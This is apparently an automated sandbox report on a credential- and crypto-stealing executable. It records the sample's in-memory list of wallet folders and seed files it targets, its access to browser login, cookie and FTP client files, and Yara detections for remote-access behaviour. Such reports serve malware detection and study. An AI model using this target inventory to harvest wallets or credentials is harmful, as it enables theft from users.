Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: \\config\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: \\config\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: Yara match File source: 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: build2.exe PID: 5316, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 19.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.build2.exe.2d915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.build2.exe.2d915a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: build2.exe PID: 7144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build2.exe PID: 5316, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs